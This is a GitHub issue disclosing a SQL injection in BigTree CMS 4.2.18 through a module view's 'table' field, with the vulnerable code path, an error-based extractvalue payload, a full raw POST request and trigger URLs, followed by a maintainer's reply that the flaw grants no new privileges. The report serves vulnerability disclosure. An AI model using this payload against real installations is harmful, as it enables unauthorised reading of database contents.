Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL injection in bigtreecms 4.2.18 #295

Closed
xfkxfk opened this issue Jun 6, 2017 · 1 comment

Comments

Projects
None yet
2 participants
@xfkxfk
Copy link

commented Jun 6, 2017

SQL injection in bigtreecms 4.2.18

FILE:
\BigTree-CMS-4.2.18\core\admin\modules\developer\modules\views\create.php
at first, Create the view
$view_id = $admin->createModuleView($module,$title,$description,$table,$type,$options,$fields,$actions,$related_form,$preview_url);
the blemish param is table

then search the view
\BigTree-CMS-4.2.18\core\admin\ajax\auto-modules\views\searchable-page.php

// Grab View Data
	if (isset($_GET["view"])) {
		$bigtree["view"] = BigTreeAutoModule::getView(sqlescape($_GET["view"]));
	}
......
$data = BigTreeAutoModule::getSearchResults($bigtree["view"],$page,$search,$sort,false);

cointinue
\BigTree-CMS-4.2.18\core\inc\bigtree\auto-modules.php

static function getView($id,$decode_ipl = true) {
			global $cms;
			
			if (is_array($id)) {
				$id = $id["id"];
			}
			
			$view = sqlfetch(sqlquery("SELECT * FROM bigtree_module_views WHERE id = '".sqlescape($id)."'"));
......
static function getSearchResults($view,$page = 1,$query = "",$sort = "id DESC",$group = false) {
			// Check to see if we've cached this table before.
			self::cacheViewData($view);
......
static function cacheViewData($view) {
$q = sqlquery("SELECT * FROM bigtree_pending_changes WHERE `table` = '".$view["table"]."' AND item_id IS NULL");
}

here the var $view["table"] have a sqli vuln

POC:
1、add a module
http://127.0.0.1/BigTree-CMS-4.2.18/site/index.php/admin/developer/modules/add/
2、add a view for module, set table as table=123_123%27 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
http://127.0.0.1/BigTree-CMS-4.2.18/site/index.php/admin/developer/modules/views/add/?module=18

POST /BigTree-CMS-4.2.18/site/index.php/admin/developer/modules/views/create/18/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 496
Referer: http://127.0.0.1/BigTree-CMS-4.2.18/site/index.php/admin/developer/modules/views/edit/15/
Cookie:
Connection: close
Upgrade-Insecure-Requests: 1

csrf_token_5TK1XAX747RXJ9X7496WHQ3F46C8134H=EINM%2FLjgLccbJjtUPYyVswTRkk7nZa%2Bs6Xb%2BPTLi8Gs%3D&title=111111&preview_url&description=&table=123_123%27 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#&related_form=&type=searchable&options=%7B%22filter%22%3A%22%22%2C%22sort%22%3A%22%60asdf%60%60+ASC%22%2C%22per_page%22%3A%2215%22%7D&fields%5Basdf%60%5D%5Bwidth%5D=748&fields%5Basdf%60%5D%5Btitle%5D=Asdf%60&fields%5Basdf%60%5D%5Bparser%5D=&actions%5Bedit%5D=on&actions%5Bdelete%5D=on

3、request the url leads to sqli:
http://127.0.0.1/BigTree-CMS-4.2.18/site/index.php/admin/ajax/auto-modules/views/searchable-page/?sort=&sort_direction=ASC&view=18&module=&search=&page=1

4、request the url leads to sqli too:
http://127.0.0.1/BigTree-CMS-4.2.18/site/index.php/admin/modules_name_at_one_step/
http://127.0.0.1/BigTree-CMS-4.2.18/site/index.php/admin/developer/modules/views/style/module_id/

sqli

@timbuckingham

This comment has been minimized.

Copy link
Collaborator

commented Jun 10, 2017

As mentioned in the other SQL injection report, Developers already have access to direct PHP calls through column parsers in modules so this doesn't lead to an escalation of existing privileges or additional data leakage.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.